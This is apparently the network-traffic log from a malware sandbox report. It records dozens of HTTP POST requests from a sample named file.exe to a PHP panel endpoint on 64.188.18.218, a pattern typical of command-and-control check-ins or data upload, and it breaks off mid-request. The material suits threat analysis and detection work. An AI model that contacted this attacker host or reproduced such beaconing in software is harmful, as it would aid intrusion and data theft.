                  Jan 13, 2021 15:26:17.737776041 CET786INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:17 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:19.222321987 CET791OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:19.344747066 CET797INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:19.474870920 CET798INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:19 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:20.957669020 CET809OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:26:21.080483913 CET811INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:21.211448908 CET814INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:21 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:22.702589035 CET823OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:22.825088024 CET823INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:22.962359905 CET825INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:22 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:24.471151114 CET834OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:24.594526052 CET835INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:24.726388931 CET837INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:24 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:26.249732018 CET884OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:26.372431040 CET884INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:26.507236004 CET885INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:26 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:28.096009970 CET2977OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:28.218303919 CET2978INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:28.350044966 CET2979INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:28 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:29.954413891 CET3510OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:30.080784082 CET3511INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:30.212291002 CET3516INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:30 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:31.860501051 CET3519OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:26:31.983078957 CET3519INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:32.115427971 CET3520INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:31 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:33.816489935 CET3521OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:33.939090967 CET3521INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:34.068063021 CET3522INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:33 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:35.818058968 CET3522OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:35.940812111 CET3523INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:36.077502966 CET3524INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:35 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:37.861300945 CET3525OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 380
                  Expect: 100-continue
                  Jan 13, 2021 15:26:37.983709097 CET3525INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:38.115866899 CET3526INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:37 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:39.928486109 CET3526OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:40.051320076 CET3527INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:40.210645914 CET3528INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:39 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:42.002931118 CET3529OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:42.125650883 CET3529INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:42.259836912 CET3530INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:42 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:44.144761086 CET3530OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:44.267282963 CET3530INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:44.399490118 CET3531INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:44 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:26:46.299314022 CET3533OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:46.422341108 CET3533INHTTP/1.1 100 Continue


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.54972564.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:25:56.380515099 CET706OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:25:56.502382040 CET706INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:25:56.636444092 CET708INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:25:56 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:25:56.945796967 CET709OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:25:57.067745924 CET710INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:25:57.203958988 CET711INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:25:57 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.54973764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:11.062050104 CET778OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:11.190917015 CET779INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:11.322704077 CET779INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:11 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.54973864.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:14.277888060 CET782OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:14.407361984 CET782INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:14.537626982 CET783INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:14 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.54973964.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:17.610426903 CET786OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:17.738689899 CET786INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:17.869286060 CET787INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:17 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.54974164.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:21.081995010 CET812OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:26:21.211977005 CET814INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:21.342246056 CET816INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:21 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.54974464.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:24.595287085 CET836OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:24.727329969 CET842INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:24.860471010 CET851INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:24 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.54975264.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:28.219491005 CET2979OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:28.349313974 CET2979INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:28.479860067 CET2980INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:28 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.54975564.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:31.983566999 CET3520OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:26:32.116180897 CET3520INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:32.246951103 CET3521INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:32 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.54975664.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:35.942375898 CET3524OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:36.077912092 CET3524INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:36.212615013 CET3525INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:36 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.54975764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:40.052512884 CET3527OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:40.209407091 CET3527INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:40.341197968 CET3528INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:40 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.54975864.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:44.268845081 CET3531OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:44.398611069 CET3531INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:44.529566050 CET3532INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:44 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.54972664.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:25:57.895196915 CET713OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:25:58.027132034 CET713INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:25:58.160243034 CET714INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:25:57 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Jan 13, 2021 15:25:58.687722921 CET716OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:25:58.810641050 CET717INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:25:58.946628094 CET717INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:25:58 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.54975964.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.54976064.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.54976164.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.54976264.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.54976464.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.54976564.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.54976664.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.54976764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.54976864.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.54976964.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.54972764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:25:59.879075050 CET720OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:00.017774105 CET721INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:00.148861885 CET722INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:25:59 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.54977064.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.54977164.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.54977264.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.54977364.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.54977764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.54978564.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.54978664.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.54978764.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.54972864.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:01.042892933 CET724OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:01.165296078 CET724INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:01.298976898 CET725INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:01 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.54972964.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:02.342319965 CET729OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
